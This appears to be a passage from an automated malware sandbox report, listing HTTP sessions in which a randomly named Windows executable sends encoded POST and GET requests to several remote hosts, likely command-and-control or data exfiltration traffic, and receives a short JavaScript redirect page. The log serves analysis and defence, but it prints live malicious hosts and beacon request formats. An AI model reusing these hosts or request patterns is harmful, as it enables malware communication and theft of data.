[TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49851	27.124.4.246	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:24.390343904 CET	768	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 7a 52 71 39 76 58 52 68 76 30 61 30 30 57 4d 6c 41 2f 68 7a 41 51 49 6e 4e 36 56 77 3d 3d Data Ascii: 6vSXrZxp=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGzRq9vXRhv0a00WMlA/hzAQInN6Vw==
Nov 24, 2024 08:13:25.775538921 CET	525	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 350 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49857	27.124.4.246	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:27.053759098 CET	1781	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 6a 37 67 34 46 6e 63 73 36 65 72 5a 30 54 70 53 46 70 74 53 31 67 4a 34 79 70 46 46 45 6f 67 46 47 31 41 31 4d 7a 33 46 55 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2b 52 45 5a 43 5a 64 4d 50 2b 36 57 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 [TRUNCATED] Data Ascii: 6vSXrZxp=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8coRHkPnkj7g4Fncs6erZ0TpSFptS1gJ4ypFFEogFG1A1Mz3FUfW+vH5vsIxN/3TRzOjmlY2noZpbHH60qM1Tvl2mMJ/lIahjCsLeZ78uEShQ9lD+REZCZdMP+6W6VLYXb4I/BaUCl/sJEtCxn2MWT12vt158uNkSRRsoDIuAYXTHq8wi+RtikKYlVcAFtdIfvl3K2pKNWTnEw8UcY4VhS0CYy7OlshfHgArW9u4saxfYEKBUM9n+UlVzl29Z6Y3wevJr0WZga5FAE4gn1Lt6xn/RaedHbT4+jMvRqIj0gQhTgfref3qPNVHoKZFRfgjqlNZKA4o9EpGl41Y3hT8z6VXvhSDEICUKgoBfBYQ5b834Y4lk7sCZ07PM9vMjckvT2X0tPv4Renr4tgUNZ9BnCM1Vw8cMyJjg2xiS6dDm88PLE6kaauL5GJexBK1VvPziAmWzUe6vM5zYVlXSRKKZ/jJaW9+/c5LO291tQMSovrCQckzykByqc0FxC6R89KqL/G2IO/aghVVClHyEwz/+UuUX+d8e9UbWdFs3B0IkJrTzz0pBsH6+zXkrxMqfzO1mw51VQ8Su3sI1e8zYwYJIopIdAZqeS7YwE/OKMKG6wQ1iXcYWGZH4aTSbSnHhMj9bXu6z3IndFAxkdqueVdk2xgegiFabZEcq+QXo54n5yHnTXTjlliOMdXKYu4FyOEpPTWRZpSex80I4nKkKgp9ZoUPwmmuFCLqoRhK/6dYNIlP8H1yKQlhdcI0XVQ/PZ3ZS+OZmEEnhpN3Tg2Mzor86CffJsxdMT5eaXu4c5+PUDyUGxv3Eiuk/P4XlazAd/N4AV1 [TRUNCATED]
Nov 24, 2024 08:13:28.431194067 CET	525	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 350 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49863	27.124.4.246	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:29.712353945 CET	478	OUT	GET /sgdd/?6vSXrZxp=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZCyCtFSFHqJZS4hLcKGIJEWFKX2dKFA==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.laohub10.net Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:13:31.067595005 CET	525	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 350 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49883	149.88.81.190	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:37.452442884 CET	738	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 49 6b 48 51 4d 6b 36 44 2f 6e 79 78 6b 52 41 6c 2b 41 62 6c 4c 62 48 34 62 50 5a 33 Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnIkHQMk6D/nyxkRAl+AblLbH4bPZ3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49889	149.88.81.190	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:40.112900972 CET	762	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 48 66 63 6f 51 66 65 69 5a 58 39 37 6c 2f 4e 56 79 4c 4b 70 6f 72 68 53 35 75 48 67 3d 3d Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMHfcoQfeiZX97l/NVyLKporhS5uHg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49895	149.88.81.190	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:42.781936884 CET	1775	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 79 57 32 4a 4d 50 6f 65 4a 4d 73 66 57 51 79 33 4f 30 73 55 56 79 47 63 4d 42 64 6c 7a 67 59 56 4c 4b 4c 41 34 54 43 50 6d 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 70 42 38 75 2b 7a 4d 37 38 64 37 56 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a [TRUNCATED] Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3quo2pW1yW2JMPoeJMsfWQy3O0sUVyGcMBdlzgYVLKLA4TCPmsyMZc4xoFheoicKIU/lPeCPvqskjFry9di9fXx1wStKBk/WBF4PaG7OwGut045pB8u+zM78d7V+Vv25Q7mX2XqnLTUQKFe8J9Nn8/Dfn+7C/4+jXqlFSMdCLIkw/STqEVxluvhR65C/53cFUngoj7pGH0C1M6Q9E/ohAmHdu52d2B+v91Lwiph01Xadcm+qHL85s/NS/OCS3hAYBYd8RxlvJg40wVIdjm6Qpcx476mFo1e1pcbv4eI8gA02+XazVEJGPCm2oe8FY/pSbYEsjR98sAoHKG1nE3EY+IL8JSLc7ZUjefZFjWYqmmkxZrtr0DsC/LJ+SCur5S6dEuJeurn5PE3t9ktZqc3x04awDzTGJem1LFvpSaHXuGVv8bkzFlliIsSs6oYJ3zUHNq+rOCD5u9NhKHfqSvWX70bGibNQ4dFCbC+hYy6h7L5JqFAHtnT3UNHBM48hI+wOiRvKPCamRooXf/nTgp4U+vFs87KRe6/X0UUUzdJHyNBVOlEFA09qnSW1mKc1SwbED6TdSezA+A5OhlVaeMi8w3o5gtlhcVxIOuSRI3FEDuLgxam/80GOXW3axMADPB/zxAWM9oRKehpYzxc93fBCkeCtZlL/8rgzQ7/5vCsAwLS3hlnPp0ZgYYMjc9ZKTLrxZS0rwsdsQtycTY6tgO0rLp0JVbT2vY0V7OS93La+S7K47LCk+j3iAxTJwEUMmrRJmbTuc4Q8166tuOPa7zzEEYQwn3TeSB6Gq2DfRiabpRKKGWHTfAgTWpnl/YgVREzEuU [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49902	149.88.81.190	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:13:45.447259903 CET	476	OUT	GET /rq1s/?av=Zj6TS2&6vSXrZxp=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFlLQlu0hJqsiOw5MBYhb6NnUPB5dt5g== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.xcvbj.asia Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49967	85.159.66.93	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:13.715888023 CET	747	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 70 70 5a 46 46 31 69 77 55 70 2f 47 39 33 66 67 77 73 48 6c 73 33 44 55 6a 4a 2b 39 Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRppZFF1iwUp/G93fgwsHls3DUjJ+9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49973	85.159.66.93	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:16.376543999 CET	771	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 44 7a 6b 75 33 56 6d 75 59 76 78 57 76 4c 46 79 6d 43 69 6d 43 58 39 6d 31 72 38 77 3d 3d Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gDzku3VmuYvxWvLFymCimCX9m1r8w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49979	85.159.66.93	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
